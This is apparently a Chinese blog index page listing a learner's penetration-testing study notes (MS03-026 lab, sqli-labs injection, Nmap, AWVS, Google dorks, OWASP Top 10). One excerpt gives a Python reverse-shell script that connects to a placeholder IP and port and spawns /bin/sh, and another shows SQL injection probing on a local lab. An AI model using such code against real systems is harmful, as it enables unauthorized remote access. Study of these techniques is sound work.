hack
关注
分享
扫一扫
hack的学习笔记以及成长之路
圣默
性别男 爱好宅 你想怎样?雨偶无瓜
展开
-
MS03-026
靶场简介Windows系统漏洞靶场1靶场知识点信息获取,缓冲区溢出,Metasploit攻击靶场描述靶场知识点漏洞名称:MS03-026漏洞介绍:Microsoft Windows DCOM RPC接口长主机名远程缓冲区溢出漏洞。此漏洞最初由lsd-pl.net漏洞研究组在2003年7月16日发现的。这个漏洞被披露以后,随着exploit程序的公开,网上迅速出现了大量的exploit攻击实例,随后利用者个漏洞的蠕虫程序也大量出现,带来了巨大的危害。可以说这是个非常严重的漏洞,影响客户非常广泛原创 2021-09-16 20:12:15 · 2390 阅读 · 0 评论 -
一个常见反弹shell脚本详解
# !/usr/bin/pythonimport os, subprocess,sockets = socket.socekt(socket.AF_INET,scoket.SOCK_STREAM)s.connect("IP","port")os.dup2(s.fileno(),0)os.dup2(s.fileno(),1)os.dup2(s.fileno(),2)p = sunprocess.call(["/bin/sh","-i"])fileno() 方法返回一个整型的文件描述符(原创 2021-09-16 15:38:23 · 133 阅读 · 0 评论 -
2021-09-09
sqli-labs 靶场打靶basic challengesless-1http://localhost/sqli-labs-master/Less-1/?id=1有信息出现,可以进行联合查询注入根据标题信息,基于get请求的单引号注入,我们可以判断闭合符号为单引号http://localhost/sqli-labs-master/Less-1/?id=1‘出现报错信息,报错如下:You have an error in your SQL syntax; check the manual原创 2021-09-09 21:08:56 · 122 阅读 · 0 评论 -
HTTP协议初识
HTTP请求方式HTTP1.0的请求方法HTTP1.0三种请求方式,GET,POST和HEAD掌握GET请求的标准格式掌握POST请求提交表单,上传文件的方法了解HEAD请求与GET请求的区别HTTP1.1新增的请求方法了解HTTP1.1新增的五种请求方法:OPTIONS,PUT,DELETE,TRACE,CONNECT方法的基本概念掌握HTTP1.1新增的五种请求的基本方法和产生的请求结果HTTP请求由三部分组成,分别是:请求行、消息报头、请求正文请求行以一个方法符号开头,空格原创 2020-07-01 21:59:22 · 186 阅读 · 0 评论 -
Web漏洞扫描器-AWVS
Web漏洞扫描工具一、Web漏洞扫描工具一、漏洞扫描漏洞扫描是指基于漏洞数据库,通过扫描等手段对指定的远程或者本地计算机系统的安全脆弱性进行检测,发现课利用楼梯的一种安全检测(渗透挂机)行为。二、WEB漏洞扫描器针对于Web应用程序所开发的漏洞扫描器,例如SQL注入、XSS跨站脚本攻击等常见漏洞,进行自动式扫描探测是否存在漏洞。二、安装Linux AWVS移动文件到kali分配权...原创 2020-04-21 22:02:25 · 627 阅读 · 0 评论 -
端口探测,发现脆弱站点
Nmap端口扫描1. 端口扫描的作用Nmap(“网络映射器”)是免费开放源代码(许可证)实用程序,用于网络发现和安全审核。许多系统和网络管理员还发现它对于诸如网络清单,管理服务升级计划以及监视主机或服务正常运行时间之类的任务很有用。Nmap以新颖的方式使用原始IP数据包来确定网络上可用的主机,这些主机提供的服务(应用程序名称和版本),它们正在运行的操作系统(和OS版本),包过滤器/防火墙的类型...原创 2020-04-18 22:28:25 · 308 阅读 · 0 评论 -
子域名探测
信息收集对于渗透测试前期来说是非常重要,对于目标站点较为安全的时候我们往往选择寻找子域名进行渗透测试子域名的形式:zkaq.org 顶级域名(一级)a.zkaq.org 二级域名b.a.zkaq.org 三级域名通过点的个数来判断是几级域名DNS解析就是通过dns服务器把域名解析为IP子域名的子域名:我们可以把子域名下的站点当成一个独立的站带你,但是可能防止同一台服务器上当...原创 2020-04-14 11:59:42 · 937 阅读 · 0 评论 -
安装kali出现中文乱码的解决办法
众所周知,很多东西对中文都是相当的不友好,当咱们中国的小伙伴安装了Kali虚拟机选择中文的时候 就出现了难以忍受的乱码,这个十分令人头疼。可以看到 中文字符都变成了方块乱码。 别急 我在整理了网上很多资料后,解决了这个问题 下面就给小伙伴们看一看 记不住的 可以收藏的哦输入locale -a 查看是否有en_US.UTF-8和zh_CN.UTF-8,在命令行输入dpkg-reco...原创 2020-01-15 12:07:26 · 2177 阅读 · 1 评论 -
十大应用安全威胁
常见应用安全威胁(OWASP TOP 10) 2013注入失效的身份认证和会话管理跨站脚本攻击(XSS)不安全的直接对象引用安全配置错误敏感信息泄露功能级访问控制缺失跨站请求伪造(CSRF)使用含有已知漏洞的组件未验证的重定向和转发风险评估标准风险 = 可能性 * 影响颜色越深,说明越容易发生,影响越大注入SQL注...原创 2019-12-17 18:52:47 · 2943 阅读 · 0 评论 -
谷歌常见语法解析
搜素引擎实际上就是一个爬取url的爬虫搜素引擎就是帮助我们获取信息对方的个人资料公司信息学校简介数据文件…谷歌语法:关键字功能“”双引号内的内容不可拆分site指定域名inurlurl存在关键字的网页intext网页正文中的关键字filetype指定文件类型intitle网页标题中的关键字linkLink:z...原创 2020-04-12 17:00:45 · 933 阅读 · 2 评论